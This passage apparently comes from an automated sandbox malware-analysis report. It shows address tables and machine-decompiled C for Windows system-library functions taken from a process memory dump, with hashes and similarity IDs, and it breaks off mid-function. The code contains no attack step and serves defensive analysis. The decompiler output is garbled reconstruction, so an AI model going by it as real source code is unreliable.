                            0x0131fbab
                            0x0135bf02
                            0x0131fbb1
                            0x0131fbb1
                            0x0131fbb8
                            0x0131fbbd
                            0x0131fbbd
                            0x0131fbbf
                            0x0131fbbf
                            0x0131fbc5
                            0x0131fbcb
                            0x0131fbf8
                            0x0131fbf8
                            0x0131fbfa
                            0x00000000
                            0x0131fc00
                            0x0131fc00
                            0x0131fc03
                            0x00000000
                            0x0131fc09
                            0x0131fc09
                            0x0131fc0f
                            0x0131fc15
                            0x0131fc23
                            0x0131fc23
                            0x0131fc25
                            0x0131fc27
                            0x0131fc75
                            0x0131fc7c
                            0x0131fc84
                            0x00000000
                            0x0131fc29
                            0x0131fc29
                            0x0131fc2d
                            0x0131fc30
                            0x0135bf0f
                            0x00000000
                            0x0131fc36
                            0x0131fc38
                            0x0131fc3b
                            0x0131fc41
                            0x0135bf17
                            0x0135bf19
                            0x0135bf48
                            0x0135bf4b
                            0x00000000
                            0x0135bf1b
                            0x0135bf22
                            0x0135bf24
                            0x0135bf26
                            0x00000000
                            0x0135bf2c
                            0x0135bf37
                            0x0135bf39
                            0x0135bf3b
                            0x00000000
                            0x0135bf41
                            0x0135bf41
                            0x0135bf41
                            0x0135bf41
                            0x0135bf45
                            0x00000000
                            0x0135bf45
                            0x0135bf3b
                            0x0135bf26
                            0x00000000
                            0x0131fc47
                            0x0131fc47
                            0x0131fc49
                            0x0131fcb2
                            0x0131fcb4
                            0x0131fcb6
                            0x0131fcdc
                            0x0131fcdc
                            0x00000000
                            0x0131fcb8
                            0x0131fcc3
                            0x0131fcc5
                            0x0131fcc7
                            0x00000000
                            0x0131fcc9
                            0x0131fcc9
                            0x0131fccd
                            0x00000000
                            0x0131fccd
                            0x0131fcc7
                            0x00000000
                            0x0131fc4b
                            0x0131fc4b
                            0x0131fc4e
                            0x0131fc4e
                            0x0131fc51
                            0x0131fc51
                            0x0131fc54
                            0x0131fc5a
                            0x0131fc5c
                            0x0131fc5f
                            0x0131fc61
                            0x0131fc63
                            0x0131fc65
                            0x0131fc67
                            0x0131fc6e
                            0x0131fc72
                            0x0131fc72
                            0x0131fc72
                            0x0131fc72
                            0x0131fc67
                            0x0131fc61
                            0x00000000
                            0x0131fc5a
                            0x0131fc49
                            0x0131fc41
                            0x0131fc30
                            0x0131fc27
                            0x0131fc03
                            0x0131fbcd
                            0x0131fbd3
                            0x0131fbd9
                            0x0131fbdc
                            0x0131fbde
                            0x0131fc99
                            0x0131fc9b
                            0x0131fc9d
                            0x0131fcd5
                            0x0131fcd5
                            0x0131fc89
                            0x0131fc89
                            0x00000000
                            0x0131fc9f
                            0x0131fc9f
                            0x0131fca3
                            0x00000000
                            0x0131fca3
                            0x00000000
                            0x0131fbe4
                            0x0131fbe4
                            0x0131fbe4
                            0x0131fbe4
                            0x0131fbe9
                            0x0131fbf2
                            0x00000000
                            0x0131fbf2
                            0x0131fbde
                            0x0131fbcb
                            0x0131fbab
                            0x0131fc8b
                            0x0131fc8b
                            0x0131fc8c
                            0x0131fb80
                            0x0131fb72
                            0x0131fb5e
                            0x0131fc8d
                            0x0131fc91
                            0x0131fadf
                            0x0131fadf
                            0x0131fae1
                            0x0131fae4
                            0x0131fae7
                            0x0131faec
                            0x0131faf8
                            0x0131fb00
                            0x0131fb07
                            0x0131fb0f
                            0x0131fb0f
                            0x0131fb07
                            0x00000000
                            0x0131faf8
                            0x0131fadd

                            Strings
                            • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0135BE0F
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                            • API String ID: 0-865735534
                            • Opcode ID: 5a03aeb85f764103c1c80c69d0d21feb0d105eff13d2219b99f6d8ab2db2bd86
                            • Instruction ID: fc4594c74b8099c6836db59a521081e4577b9ab27387948352fd3cbb35d16532
                            • Opcode Fuzzy Hash: 5a03aeb85f764103c1c80c69d0d21feb0d105eff13d2219b99f6d8ab2db2bd86
                            • Instruction Fuzzy Hash: AFA10571B006068BEB29DF6CC450B7AB7A9BF48B18F04457DDE46DB689DB30D849DB80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 012E2D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                            Download Yara Rule
                            C-Code - Quality: 63%
                            			E012E2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x13d5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x13d7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E013297C0();
				}
				if( *0x13d79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x13d79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E01311624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E01307D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0137FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E01329520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0131E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0133DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x13d6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x13d6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E01329980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E013295D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E01307D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E01307D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01367016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0137FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x13d5350;
							if(_t109 != 0x13d5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0137FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E01375720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                            0x012e2d8a
                            0x012e2d8a
                            0x012e2d92
                            0x012e2d96
                            0x012e2d9e
                            0x012e2da0
                            0x012e2da3
                            0x012e2da5
                            0x012e2da8
                            0x012e2dab
                            0x012e2db2
                            0x0133f9aa
                            0x0133f9ab
                            0x0133f9ae
                            0x0133f9ae
                            0x012e2db8
                            0x012e2dc2
                            0x0133f9b9
                            0x0133f9be
                            0x0133f9bf
                            0x0133f9bf
                            0x012e2dcf
                            0x0133f9c9
                            0x012e2dd5
                            0x012e2dd5
                            0x012e2dd5
                            0x012e2dde
                            0x012e2de1
                            0x012e2e70
                            0x012e2e72
                            0x012e2e72
                            0x012e2de7
                            0x012e2deb
                            0x012e2e7c
                            0x012e2e83
                            0x012e2e85
                            0x012e2e8b
                            0x012e2e8d
                            0x012e2e92
                            0x012e2e92
                            0x012e2e85
                            0x012e2df1
                            0x012e2df7
                            0x012e2df9
                            0x012e2df9
                            0x012e2dfc
                            0x012e2dff
                            0x012e2e02
                            0x00000000
                            0x012e2e05
                            0x012e2e0c
                            0x0133f9d9
                            0x012e2e12
                            0x012e2e12
                            0x012e2e12
                            0x012e2e1a
                            0x0133f9e3
                            0x0133f9e9
                            0x0133f9f0
                            0x0133f9f6
                            0x0133f9f8
                            0x0133f9f8
                            0x0133f9f0
                            0x012e2e23
                            0x0133fa02
                            0x0133fa03
                            0x0133fa05
                            0x0133fa06
                            0x00000000
                            0x012e2e29
                            0x012e2e29
                            0x012e2e2e
                            0x012e2e34
                            0x012e2e3e
                            0x00000000
                            0x00000000
                            0x012e2e44
                            0x012e2e47
                            0x012e2e4d
                            0x00000000
                            0x00000000
                            0x012e2e4f
                            0x012e2e54
                            0x00000000
                            0x00000000
                            0x012e2e5a
                            0x012e2e5f
                            0x012e2e9a
                            0x012e2ea4
                            0x012e2ea5
                            0x012e2ea8
                            0x012e2eaf
                            0x012e2eb2
                            0x012e2eb5
                            0x0133fae9
                            0x0133faeb
                            0x0133faed
                            0x0133faef
                            0x0133faf7
                            0x0133faf8
                            0x0133fafd
                            0x0133faff
                            0x0133fb04
                            0x0133fb04
                            0x0133faff
                            0x012e2ec0
                            0x012e2ec4
                            0x012e2ec6
                            0x012e2ec8
                            0x0133fb14
                            0x0133fb18
                            0x0133fb1e
                            0x0133fb21
                            0x0133fb21
                            0x012e2ece
                            0x012e2ece
                            0x012e2ece
                            0x012e2ed7
                            0x012e2e61
                            0x012e2e63
                            0x0133fa6b
                            0x0133fa71
                            0x0133fa76
                            0x0133fa78
                            0x0133fa8a
                            0x0133fa7a
                            0x0133fa83
                            0x0133fa83
                            0x0133fa8f
                            0x0133fa91
                            0x0133fa97
                            0x0133fa9d
                            0x0133faa4
                            0x0133faaa
                            0x0133faaf
                            0x0133fab1
                            0x0133fac3
                            0x0133fab3
                            0x0133fabc
                            0x0133fabc
                            0x0133fac8
                            0x0133facb
                            0x0133fadf
                            0x0133fadf
                            0x0133facb
                            0x0133faa4
                            0x0133fa91
                            0x012e2e6f
                            0x012e2e6f
                            0x012e2e5f
                            0x0133fa13
                            0x0133fa15
                            0x0133fa17
                            0x0133fa1f
                            0x0133fa21
                            0x0133fa22
                            0x0133fa25
                            0x0133fa28
                            0x0133fa2f
                            0x0133fa2f
                            0x0133fa2a
                            0x0133fa2a
                            0x0133fa2a
                            0x0133fa31
                            0x0133fa34
                            0x0133fa36
                            0x0133fa3c
                            0x0133fa3e
                            0x0133fa41
                            0x0133fa43
                            0x0133fa45
                            0x0133fa45
                            0x0133fa41
                            0x0133fa3c
                            0x0133fa4a
                            0x0133fa4f
                            0x0133fa51
                            0x0133fa53
                            0x0133fa56
                            0x0133fa5b
                            0x0133fa5e
                            0x00000000
                            0x0133fa5e
                            0x012e2e23

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: RTL: Re-Waiting
                            • API String ID: 0-316354757
                            • Opcode ID: 56931849cdb62767dd992a88e6ab9d225f1866a774d517f99b8c486d716d23f7
                            • Instruction ID: af44a32e347f640424244b70e7caf81914025c9679fb1c07946c5e54e0f35627
                            • Opcode Fuzzy Hash: 56931849cdb62767dd992a88e6ab9d225f1866a774d517f99b8c486d716d23f7
                            • Instruction Fuzzy Hash: 45615A31E10615DFEB32DF6CC844B7E7BECEB84318F580265D612972C1C774A9018B82
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 013B0EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                            Download Yara Rule
                            C-Code - Quality: 80%
                            			E013B0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E013AFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E013B1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E01329730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E013AA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E013AA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x13d8b04 >> 0x14) + (_v44 -  *0x13d8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E01307D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E013A138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E01307D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0139FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x13d8724 & 0x00000008) != 0) {
						E013A52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E013B15B5(0x13d8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                            0x013b0eb7
                            0x013b0eb9
                            0x013b0ec0
                            0x013b0ec2
                            0x013b0ecd
                            0x013b105b
                            0x013b105b
                            0x013b1061
                            0x013b1066
                            0x013b1066
                            0x013b106b
                            0x013b1073
                            0x013b1073
                            0x013b0ed3
                            0x013b0ed6
                            0x013b0edc
                            0x013b0ee0
                            0x013b0ee7
                            0x013b0ef0
                            0x013b0ef5
                            0x013b0efa
                            0x013b0efc
                            0x013b0efd
                            0x013b0f03
                            0x013b0f04
                            0x013b0f06
                            0x013b0f07
                            0x013b0f09
                            0x013b0f0e
                            0x013b0f14
                            0x013b0f23
                            0x013b0f2d
                            0x013b0f34
                            0x013b0f34
                            0x013b0f14
                            0x013b0f52
                            0x00000000
                            0x00000000
                            0x013b0f58
                            0x013b0f73
                            0x013b0f74
                            0x013b0f79
                            0x013b0f7d
                            0x013b0f80
                            0x013b0f86
                            0x013b0fab
                            0x013b0fb5
                            0x013b0fc6
                            0x013b0fd1
                            0x013b0fe3
                            0x013b0fd3
                            0x013b0fdc
                            0x013b0fdc
                            0x013b0feb
                            0x013b1009
                            0x013b1009
                            0x013b1015
                            0x013b1027
                            0x013b1017
                            0x013b1020
                            0x013b1020
                            0x013b102f
                            0x013b103c
                            0x013b103c
                            0x013b1048
                            0x013b1050
                            0x013b1050
                            0x013b1055
                            0x00000000
                            0x013b1055
                            0x013b0f88
                            0x013b0f9e
                            0x013b0fa2
                            0x013b0fa9
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013b0fa9
                            0x00000000

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: `
                            • API String ID: 0-2679148245
                            • Opcode ID: 389c5e856891dda974184c53ff601885cd90c953c5413af9d30917dfe4b6190b
                            • Instruction ID: b278a67f21557bcc2e85200718d10c5c908dac81bb0f5d92319c78a7710583d7
                            • Opcode Fuzzy Hash: 389c5e856891dda974184c53ff601885cd90c953c5413af9d30917dfe4b6190b
                            • Instruction Fuzzy Hash: 4A519F713043429FD325DF28E8D4B5BBBE9EBC4708F04092DF69697A90E670E909C762
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0131F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                            Download Yara Rule
                            C-Code - Quality: 75%
                            			E0131F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E01304120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E01329830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E01329990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E013295D0();
							goto L11;
						} else {
							_t109 = L01304620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0132F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E013295D0();
										L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                            0x0131f0d3
                            0x0131f0d9
                            0x0131f0e0
                            0x0131f0e7
                            0x0131f0f2
                            0x0131f0f4
                            0x0131f0f8
                            0x0131f100
                            0x0131f108
                            0x0131f10d
                            0x0131f115
                            0x0131f116
                            0x0131f11f
                            0x0131f123
                            0x0131f124
                            0x0131f12c
                            0x0131f130
                            0x0131f134
                            0x0131f13d
                            0x0131f144
                            0x0131f14b
                            0x0131f152
                            0x0135bab0
                            0x0135bab0
                            0x0131f158
                            0x0131f158
                            0x0131f15a
                            0x0131f160
                            0x0131f165
                            0x0131f166
                            0x0131f16f
                            0x0131f173
                            0x0135baa7
                            0x0135baa7
                            0x0135baab
                            0x00000000
                            0x0131f179
                            0x0131f18d
                            0x0131f191
                            0x0135baa2
                            0x00000000
                            0x0131f197
                            0x0131f19b
                            0x0131f1a2
                            0x0131f1a9
                            0x0131f1af
                            0x0131f1b2
                            0x0131f1b6
                            0x0131f1b9
                            0x0131f1c4
                            0x0131f1d8
                            0x0131f1df
                            0x0131f1e3
                            0x0131f1eb
                            0x0131f1ee
                            0x0131f1f4
                            0x0131f20f
                            0x0135bab7
                            0x0135babb
                            0x0135bacc
                            0x0135bad1
                            0x0131f215
                            0x0131f218
                            0x0131f226
                            0x0131f22b
                            0x00000000
                            0x0131f22b
                            0x0131f1f6
                            0x0131f1f6
                            0x0131f1f9
                            0x0131f1fb
                            0x0131f1fb
                            0x0131f1f4
                            0x0131f191
                            0x0131f173
                            0x0131f152
                            0x0131f203

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: @
                            • API String ID: 0-2766056989
                            • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                            • Instruction ID: 8c4eb0fb1093d8e2ed115f69f11b060ac10037978ece70c568ef431a827783c6
                            • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                            • Instruction Fuzzy Hash: DC518D716047119FD321DF29C840A6BBBF9FF48B18F10892DFAA587690E7B4E914CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01363540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                            Download Yara Rule
                            C-Code - Quality: 75%
                            			E01363540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x13dd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E01320BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E01363706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0132FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01363540;
						E0132FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0133DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E01370C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E013297C0();
					}
					return E0132B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01363971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01363884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0132FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E01329650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E01363787(_a4,  &_v352, _t80);
						}
					}
					L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E013295D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                            0x01363552
                            0x0136355a
                            0x0136355d
                            0x01363566
                            0x01363567
                            0x0136357e
                            0x0136358f
                            0x013635a1
                            0x013635a5
                            0x0136366b
                            0x0136366b
                            0x0136366d
                            0x01363672
                            0x01363679
                            0x01363685
                            0x0136368d
                            0x0136369d
                            0x013636a7
                            0x013636b8
                            0x013636c6
                            0x013636c7
                            0x013636dc
                            0x013636e1
                            0x013636e7
                            0x013636e9
                            0x013636e9
                            0x01363703
                            0x01363703
                            0x013635b5
                            0x013635c0
                            0x013635c4
                            0x00000000
                            0x00000000
                            0x013635ca
                            0x013635d7
                            0x013635e2
                            0x013635e6
                            0x013635e8
                            0x013635f5
                            0x013635fa
                            0x01363603
                            0x01363604
                            0x01363609
                            0x0136360a
                            0x01363612
                            0x01363613
                            0x0136361e
                            0x01363622
                            0x01363628
                            0x0136362f
                            0x0136362f
                            0x01363636
                            0x01363638
                            0x0136363b
                            0x01363642
                            0x01363642
                            0x01363636
                            0x01363657
                            0x01363657
                            0x0136365c
                            0x01363662
                            0x01363669
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: BinaryHash
                            • API String ID: 0-2202222882
                            • Opcode ID: 9867e5b1ff9de4d55ab7694de724dd0ebf3a59141eb9afc655e8bd58c68ccd44
                            • Instruction ID: 8589596f714c06ebc1da135229012eabc35a856e6852088f0218ab4600f8694e
                            • Opcode Fuzzy Hash: 9867e5b1ff9de4d55ab7694de724dd0ebf3a59141eb9afc655e8bd58c68ccd44
                            • Instruction Fuzzy Hash: BD4146B1D0052D9BDF21DA54CC85FDEB77CAB54728F0085A5EA0DA7241DB309E88CFA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 013B05AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                            Download Yara Rule
                            C-Code - Quality: 71%
                            			E013B05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
